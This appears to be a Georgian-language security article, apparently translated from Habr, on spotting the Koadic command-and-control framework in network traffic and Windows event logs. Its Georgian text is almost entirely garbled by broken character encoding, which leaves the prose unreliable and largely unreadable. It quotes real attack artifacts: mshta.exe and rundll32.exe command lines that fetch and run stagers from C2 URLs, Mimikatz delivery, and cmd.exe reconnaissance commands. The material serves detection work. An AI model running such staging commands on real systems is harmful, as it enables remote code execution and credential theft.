WS แแแกแฃแฎแแก แชแแแแแแก แกแแคแฃแซแแแแแ แแ แแแแแ, แ แแ แจแแกแ แฃแแแแ แฎแแแแ WScript.Shell-แแก แแแจแแแแแแ, แฎแแแ แชแแแแแแแ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE แจแแแชแแแก แกแแแแแแซแ แแแคแแ แแแชแแแก แแแแแแแแ แ แกแแกแแแก แแแ แแแแขแ แแแแก แจแแกแแฎแแ. แแก แแ แแก แแแ แแแแ แแแแฎแแแแ-แแแกแฃแฎแแก แฌแงแแแแ HTTP แแแแจแแ แจแ CnC แกแแ แแแ แแแ. แจแแแแแแแ แแแแฎแแแแแแ แแแ แแแแแ แแแแจแแ แจแแ แแแฌแแแแแฃแแ แแแแฃแแแแแก (แแแแแแแขแแแแก) แคแฃแแฅแชแแแแแแฃแ แแแแกแแแ. แงแแแแ Koadic แแแแฃแแ แแฃแจแแแแก แแฎแแแแ แแฅแขแแฃแ แ แกแแกแแแ CnC-แแ.
แแแแแแแข
แแกแแแ, แ แแแแ แช CME แแฃแจแแแแก Bloodhound-แแแ, Koadic แแฃแจแแแแก Mimikatz-แแแ, แ แแแแ แช แชแแแแ แแ แแแ แแแแกแแแ แแ แแฅแแก แแแกแ แแแจแแแแแก แแ แแแแแ แแแ. แฅแแแแแ แแแชแแแฃแแแ แแแแฎแแแแ-แแแกแฃแฎแแก แฌแงแแแแ Mimikatz แแแแแแแขแแก แฉแแแแกแแขแแแ แแแ.
แแ แแแฏแ. 12. แแแแแแแชแแก แแแแแชแแแ แแแแแแแแ
แแฅแแแ แฎแแแแแ, แแฃ แ แแแแ แจแแแชแแแแ URI แคแแ แแแขแ แแแแฎแแแแแจแ. แแฎแแ แแก แจแแแชแแแก csrf แชแแแแแแก แแแแจแแแแแแแแก, แ แแแแแแช แแแกแฃแฎแแกแแแแแแแแ แแ แฉแแฃแ แแแแฃแแแ. แงแฃแ แแแฆแแแ แแ แแแแฅแชแแแ แแแก แกแแฎแแแก; แฉแแแ แงแแแแแ แแแชแแ, แ แแ CSRF แฉแแแฃแแแแ แแ แกแฎแแแแแแ แแ แแ แแก แแแแแแฃแแ. แแแกแฃแฎแ แแงแ Koadic-แแก แแแแแ แซแแ แแแแแ แแแฌแแแ, แ แแแแแกแแช แแแแแแขแ แแแแแแแชแแแ แแแแแแจแแ แแแฃแแ แแแแ. แแก แกแแแแแแ แแแแแ, แแแแขแแ แแแแแ แแแแแแฎแแแแ แซแแ แแแแ แแฃแแฅแขแแแก. แแฅ แแแแฅแแก Mimikatz-แแก แแแแแแแแแแ, แ แแแแแแช แแแแแ แแแฃแแแ base64-แจแ, แกแแ แแฃแแ .NET แแแแกแ, แ แแแแแแช แแแแแแแฃแจแแแแแก แแแก แแ แแ แแฃแแแแขแแแ Mimikatz-แแก แแแกแแจแแแแแ. แจแแกแ แฃแแแแแก แจแแแแแ แแแแแแชแแแ แฅแกแแแจแ แแแแคแแ แขแแฅแกแขแแ.
แแ แแแฏแ. 13. แแแกแขแแแชแแฃแ แแแแฅแแแแแ Mimikatz-แแก แแแจแแแแแก แจแแแแแ
Exec_cmd
Koadic-แก แแกแแแ แแฅแแก แแแแฃแแแแ, แ แแแแแแกแแช แจแแฃแซแแแแ แแแกแขแแแชแแฃแ แแ แจแแแกแ แฃแแแ แแ แซแแแแแแแ. แแฅ แฉแแแ แแแแฎแแแ แแแแแ URI แแแแแ แแ แแแแก แแแแแแก แแ แแแชแแแ sid แแ csrf แชแแแแแแแก. exec_cmd แแแแฃแแแก แจแแแแฎแแแแแจแ, แแแแ แแแแขแแแ แกแฎแแฃแแก, แ แแแแแกแแช แจแแฃแซแแแ แจแแแกแ แฃแแแก shell แแ แซแแแแแแแ. แฅแแแแแ แแแฉแแแแแแแ แแกแแแ แแแแ, แ แแแแแแช แจแแแชแแแก CnC แกแแ แแแ แแก HTTP แแแกแฃแฎแก.
แแ แแแฏแ. 14. แแแแแแแขแแก แแแแ exec_cmd
แแแแแก แจแแกแแกแ แฃแแแแแแ แกแแญแแ แแ GAWTUUGCFI แชแแแแแ แแแชแแแแ WS แแขแ แแแฃแขแแ. แแแกแ แแแฎแแแ แแแแ, แแแแแแแขแ แฃแฌแแแแแก แแแ แกแก, แแแฃแจแแแแแก แแแแแก แแ แขแแขแก - shell.exec แแแแแแแแแแ แแแแแชแแแแแแก แแแแแแแก แแแแ แฃแแแแแ แแ shell.run แแแแ แฃแแแแแก แแแ แแจแ.
Koadic แแ แแ แแก แขแแแแฃแ แ แแแกแขแ แฃแแแแขแ, แแแแ แแ แแแก แแฅแแก แกแแแฃแแแ แ แแ แขแแคแแฅแขแแแ, แ แแแแแแแช แแแกแ แแแแแ แแแแแขแแแฃแ แขแ แแคแแแจแแ แจแแกแแซแแแแแแ:
- HTTP แแแแฎแแแแแแแก แกแแแชแแแแฃแ แ แคแแ แแแ แแแ,
- winHttpRequests API-แก แแแแแงแแแแแแ,
- WScript.Shell แแแแแฅแขแแก แจแแฅแแแ ActiveXObject-แแก แแแจแแแแแแ,
- แแแแ แจแแกแ แฃแแแแแแ แกแฎแแฃแแ.
แแแแแแแแ แแแแ แแแแจแแ แ แแแแชแแ แแแฃแแแ แกแขแแแฏแแ แแก แแแแ , แแแแขแแ แจแแกแแซแแแแแแแ แแแกแ แแฅแขแแแแแแก แแฆแแแฉแแแ Windows-แแก แฆแแแแกแซแแแแแแแก แกแแจแฃแแแแแแ. mshta-แกแแแแก แแก แแ แแก แแแแแแแ 4688, แ แแแแแแช แแแฃแแแแแแก แแ แแชแแกแแก แจแแฅแแแแแ start แแขแ แแแฃแขแแ:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
แกแแแแ Koadic แแฃแจแแแแก, แจแแแแซแแแแ แแแฎแแ แกแฎแแ 4688 แแแแแแแ แแขแ แแแฃแขแแแแ, แ แแแแแแแช แจแแกแแแแจแแแแแ แแฎแแกแแแแแแก แแแก:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
แแแกแแแแแแ
แแแฌแแก แแแแแแแแแแ แชแฎแแแ แแแแก แขแแแแแแชแแ แแ แแแแแแแแแจแ แแแแฃแแแ แแแแก แแซแแแก. แแกแแแ แแงแแแแแแ Windows-แจแ แฉแแจแแแแแฃแ แแแกแขแ แฃแแแแขแแแกแ แแ แแแฅแแแแแแแแก แแแแ แกแแญแแ แแแแแกแแแแก. แฉแแแ แแฎแแแแแ แแแแฃแแแ แฃแ แแแกแขแ แฃแแแแขแแแก Koadic, CrackMapExec แแ Impacket, แ แแแแแแแช แแ แแ แแแชแแแก แแชแแแแ, แกแฃแ แฃแคแ แ แฎแจแแ แแ แฉแแแแแแแ APT แแแแแ แแจแแแจแ. แแกแแแ แแแ แแแแ แฉแแแแแแแแก แ แแแแแแแแ GitHub-แแ แแ แฎแแแกแแฌแงแแแแแกแแแแก แแ แฉแแแแแ แแฎแแแแ (แแฎแแ แฃแแแ แแแแฎแแแแแแ แแแแกแแ). แขแแแแแแชแแ แแแแฃแแแ แแแแก แแซแแแก แแแกแ แกแแแแ แขแแแแก แแแแ: แแแแแแแกแฎแแแแแแก แแ แกแญแแ แแแแแ แแแกแแแ แแฎแแ แแก แฎแแแกแแฌแงแแแแ; แแกแแแ แฃแแแ แแ แแแ แแแแแ แแแแแฃแแแ แแแแฅแแแแแแ แแ แแฎแแแ แแแแแ แแแ แฃแกแแคแ แแฎแแแแแก แแแแแแแก แแแแ แแแก แแแแแ. แฉแแแ แงแฃแ แแแฆแแแแก แแแแแฎแแแแแแ แฅแกแแแฃแ แ แแแแฃแแแแแชแแแก แจแแกแฌแแแแแแ: แแแแแ แแฆแฌแแ แแแ แแแแแแฃแแ แแแกแขแ แฃแแแแขแ แขแแแแแก แกแแแฃแแแ แแแแแก แฅแกแแแฃแ แขแ แแคแแแจแ; แแแแแ แแแขแแแฃแ แแ แจแแกแฌแแแแแ แกแแจแฃแแแแแ แแแแแชแ แแแแกแฌแแแแแแแแ แฉแแแแ แแ แแแฃแฅแขแ
แแแขแแ แแแ:
- แแแขแแ แขแแฃแ แแแ, PT Expert Security Center, Positive Technologies, แกแแแฅแกแแแ แขแ แแแแกแแฎแฃแ แแแแก แแแแแ แขแแแแแขแแก แฃแคแ แแกแ
- แแแแ แแแแแแแแแ, แแฅแกแแแ แขแ, PT แแฅแกแแแ แขแ แฃแกแแคแ แแฎแแแแแก แชแแแขแ แ, แแแแแขแแฃแ แ แขแแฅแแแแแแแแแ
แฌแงแแ แ: www.habr.com